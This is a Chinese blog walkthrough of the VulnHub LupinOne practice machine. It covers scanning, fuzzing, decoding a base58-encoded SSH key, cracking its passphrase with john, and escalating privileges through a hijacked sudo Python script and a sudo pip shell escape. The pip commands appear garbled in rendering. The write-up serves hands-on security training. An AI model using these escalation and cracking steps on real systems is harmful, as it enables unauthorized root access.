VulnHub-Empire_ LupinOne靶机详细渗透过程

最新推荐文章于 2025-02-25 20:11:07 发布
最新推荐文章于 2025-02-25 20:11:07 发布
阅读量1.5k 收藏 7
点赞数 1
分类专栏: 教程 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/MRS_jianai/article/details/128473608
版权
本文详细介绍了一次完整的靶机渗透过程,包括靶机部署、信息收集、渗透攻击及权限提升等关键步骤。通过使用nmap、dirsearch、whatweb等工具进行信息收集,利用ffuf进行深度扫描,并借助john破解工具实现密码破解。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.靶机部署

kali安装:https://blog.youkuaiyun.com/l2872253606/article/details/123592717?spm=1001.2014.3001.5502
靶机下载:https://download.vulnhub.com/empire/01-Empire-Lupin-One.zip
得到三个文件,稍后需要打开的shi.ovf的文件:
image.png
使用VMware打开该文件:
image.png
设置好名称和虚拟机位置:
注意:导入过程中可能会提示导入失败,点击重试即可。
image.png
虚拟机的基本设置:
image.png
导入成功,打开虚拟机,到此虚拟机部署完成!
image.png
注意:靶机的网络连接模式必须和kali一直,让DC靶机跟kali处于同一网段,这用kali才能扫出DC的主机。

2.信息收集

2.1 探测IP

使用nmap扫描同一个段下存活的IP

nmap 192.168.11.0/24

发现153开启了80端口,通过访问确实是我们的靶机!
image.png

2.2 详细信息扫描

使用nmap对靶机开放的端口进行更详细的扫描:

nmap -A -T4 -p- 192.168.11.153

image.png

2.3 敏感目录

dirsearch -u 192.168.11.153 -e *

image.png

2.4 指纹收集

whatweb -v 192.168.11.153

image.png

3.渗透过程

3.1 访问敏感目录

简单访问一下敏感目录:
image.png
提示了一个文件夹:myfiles,访问肯定是访问不了的,的意思大概是让我们模糊测试:
image.png

3.2 使用ffuf进行深度扫描

模糊测试:
使用ffuf进行扫描,该工具用途广泛,可用于多种用途。一些用途:
目录发现,可选择在 URL 中的任何位置进行模糊测试
子域名发现
使用各种 HTTP 方法进行模糊测试
命令:ffuf -c -w /usr/share/wordlists/dirb/common.txt -u ‘http://192.168.11.153/~FUZZ’
参数解释:

  • -c 有颜色输出
  • -w 指定字典
  • -u 指定暴力破解的目录,FUZZ 就是暴力破解的目录

很快就找到了一个有用的文件:
image.png
访问试试:
根据提示大概得到以下信息:

  • 需要一个SSH私钥
  • passphras的破解需要用fasttrack,这是john的一个密码字典
  • 用户名是:icex64

image.png
这里源码我也查看了,毫无意义。
这里再继续分析一下这个,他说,创建secret这个目录的原因就是为了分享他的私钥文件,那意思文件肯定是在secret这个目录之下,然后是个文件。
这里的话,访问文件是有文件后缀,打算拿ffuf跑一下文件后缀,

ffuf -u ‘http://192.168.11.153/~secret/.FUZZ’ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e .txt,.pub,.html,.bak -mc 200

image.png
这样呢我们就得到了一个文件,访问一下:
注意:访问的时候文件名前面加.(点)
image.png

3.3 Base58加密破解

得到了一个加密的文本:
分析一下,没有等号,说明不是base64,最后我查了一下,发现是base58

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

进行解码:

网站:http://www.metools.info/code/c74.html

image.png
解码之后呢我们需要保存为一个文件:
image.png

3.4 john破解

然后使用ssh2john工具转化为john可破解的格式:

/usr/share/john/ssh2john.py ssh_key > hash

image.png
使用john破解hash:

john --wordlist=/usr/share/wordlists/fasttrack.txt hash

得到密码:

P@55w0rd!

image.png

3.5 用户登录

登录之前我们需要给私钥文件权限:

chmod 600 ssh_key

image.png
登录:

ssh icex64@192.168.11.153 -i ssh_key

image.png

3.3 提权

查看拥有的权限:

sudo -l

image.png
发现arsene可以无密码使用/home/arsene/heist.py,看一下这个脚本的内容:

cat /home/arsene/heist.py

image.png
脚本内容大概是:到日一个webbrowser库,然后输出一些东西,webbrowser应该是自定义的库,那我们找一下这个库在哪儿:

find / -type f -name webbrowser.py 2>/dev/null

image.png
找到之后看一下内容:

image.png
分析脚本:
首先我们可以无密码使用arsene的这个脚本,脚本的第一行是导入os模块,那么我们是否可以使用os.system打开一个arsene的shell呢?
理论存在,实践开始:
使用vi命令在脚本里面增加一行:

os.system(“/bin/bash”)

image.png
然后执行脚本:

sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

这样一来我们就得到了一个arsene用户的shell
image.png
查看权限:
image.png
发现可以使用root的身份执行pip命令:
具体原理可以参考这篇文章:http://cn-sec.com/archives/260823.html
这里的话就三行命令:

TF= ( m k t e m p − d ) e c h o " i m p o r t o s ; o s . e x e c l ( ′ / b i n / s h ′ , ′ s h ′ , ′ − c ′ , ′ s h < (mktemp -d) echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh < (mktempd)echo"importos;os.execl(/bin/sh,sh,c,sh<(tty) > ( t t y ) 2 > (tty) 2> (tty)2>(tty)')" > $TF/setup.py
sudo pip install $TF

image.png

夺旗!!!

image.png

VulnhubEmpire: LupinOne
weixin_64112307的博客
05-08 2401
前期准备: 靶机地址: https://www.vulnhub.com/entry/empire-lupinone,750/ kali机IP:192.168.132.129 靶机IP:192.168.132.128 运行环境:VMware 一、信息收集: 使用nmap进行对靶机进行扫描 nmap -sC -sV 192.168.132.128 -p- -n -vv -min-rate=2000 发现了22与80端口,在80端口下发现robots.txt和~myfiles 利用80端.
Vulnhub empire-lupinone靶机攻击实战(一)
初学者
02-11 851
  下载压缩包之后,会看到如下的内容,我们可以在VMware中通过.ovf文件进行虚拟机的导入。   导入完成如下所示,这样就算虚拟机启动了。   搭建好项目之后,接下来就是对漏洞信息进行扫描了,如下所示。   找到靶机地址192.168.1.102,接下来就是对靶机地址进行扫描   结果如下所示。   尝试访问一下80端口,结果如下所示,没有任何有价值的东西。   接下来我们扫描一下这个服务的其他隐藏路径。   结果如下所示   我们尝试访问一下/robots.txt   尝试访问一下/~myf
靶机11 Empire Lupin One
honest_gg的博客
10-09 2627
靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权
Empire_LupinOne靶机渗透记录
最新发布
openstack_tutou的博客
02-25 1827
是 Python 标准库 os 模块中的一个函数,用于在子终端中运行系统命令。发现加密文本,观察一下使用了什么加密方式,没有等于号,排除base64,搜了一下时base58,去解密。nmap -sS -sV -p- -A 192.168.10.139 扫描靶机开放的端口。解密后得到了一个ssh连接密钥,使用john破解密钥,把密钥保存到一个文件中。告诉我们有一个私钥文件,但隐藏的很深需要我们寻找,是这个靶机用户icex64。直接连接被拒绝,更换另一种方式,给之前的key权限,使用-i 密钥文件连接。
vulnhub靶机渗透 Lupin-One
RestoreJustice的博客
03-19 215
下载地址:https://www.vulnhub.com/entry/empire-lupinone,750/​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
vulnhub-Empire: LupinOne
qq_43006864的博客
05-05 2312
Empire: LupinOne ~ VulnHub 靶机EMPIRE: LUPINONE 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: 这里vmbox直接现实了地址,就不做网段扫描了。直接扫描目标网站的详细端口信息。 map -sS -sV -A -p- 192.168.1.109 目标网站: 22/80端口 r.
VulnHub日记(十六):Empire: LupinOne
Dawn_Xi的博客
11-28 3987
参考链接 Vulnhub:Empire: LupinOne 参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.138 发现主机,nmap扫描 fping -aqg 192.168.56.0/24 nmap -A 192.168.56.138 访问http页面,同时目录枚举 dirsearch -u 192.168.56.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e
edward-gibbon_history-of-the-decline-and-fall-of-the-roman-empire-volume-1:初次提交
03-11
爱德华·长臂猿的历史,罗马帝国卷1的下降和下降 初次提交
vms-empire:设置为BBS门的VMS-Empire版本-开源
04-29
在"vms-empire-master"这个压缩包中,"master"通常表示这是项目的主分支,包含了最新的稳定代码。用户可以解压这个文件,找到游戏的源代码、编译说明和其他相关文档。如果想在本地运行或修改VMS-Empire,可能需要...
matlab2017a代码-Fibonacci_Ham_code_web:Matlab代码:斐波那契准晶体模型的哈密顿蒙特卡罗模拟
05-28
i)Detect_VC.m(在给定位置检测VC的类型)ii)Enlist_empire1D_CutProj.m(使用几何方法构建用于链配置的帝国)iii)singleFlipMonteCarloStep1D.m(基于Metropolis算法计算新的链配置) iv)countDefectsFibChain....
Vulnhub Empire Lupin One
weixin_45682839的博客
08-03 537
Vnlnhub Empire系列中靶场的第一个Lupin One学习记录攻略,涉及的技术知识有:敏感目录及文件搜索、端口扫描、ssh密钥破解密码、base58解码、Linux sudo特权命令提权、pip提权。
靶机渗透日记
Anonymous
01-17 1512
IP为 端口 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) 80/tcp open http Apache httpd 2.4.48 ((Debian)) 访问 80 端口是一张图片,接下来目录扫描 [23:08:42] 301 - 312B - /image -> http://192.168.1.64/image/ ..
VulnHub靶场---Empire-Lupin-One
qq_61670993的博客
10-20 932
小菜鸡一枚
[渗透测试学习靶机03] vulnhub靶场 Empire LupinOne
weixin_47112073的博客
10-15 1271
vulnhub靶场练习之靶机Empire LupinOne
Vulnhub:Empire Lupin One靶机渗透测试
Aukum的博客
05-07 953
VulnHub Empire Lupin One,ssh私钥登录,linux系统pip提权
Vulnhub靶机——EMPIRE: LUPINONE(PiP命令提权)
流水不争先,争的是滔滔不绝
04-09 1240
Vulnhub靶机——EMPIRE: LUPINONE——PiP命令提权(sudo)
靶机渗透练习41-Empire Lupin One
热门推荐
hirak0的博客
04-18 2万+
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/ Description Difficulty: Medium This box was created to be medium, but it can be hard if you get lost. CTF like box. You have to enumerate as much as you can. For hints discord Server ( https://d
EMPIRE: LUPINONE实战演练
龙狼刺的博客
05-30 1056
Empire:LupinOne
01 - Empire Lupin One
bobo_milk的博客
05-21 915
目录 一、信息收集 二、漏洞发现 三、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.151 可以看到服务器开启了80端口,和22端口,22端口只能用来爆破,因此先查看一下80端口。 二、漏洞发现 访问80端口 没奇怪的地方,源代码也没有提示。 对网站进行目录扫...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小秋LY

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值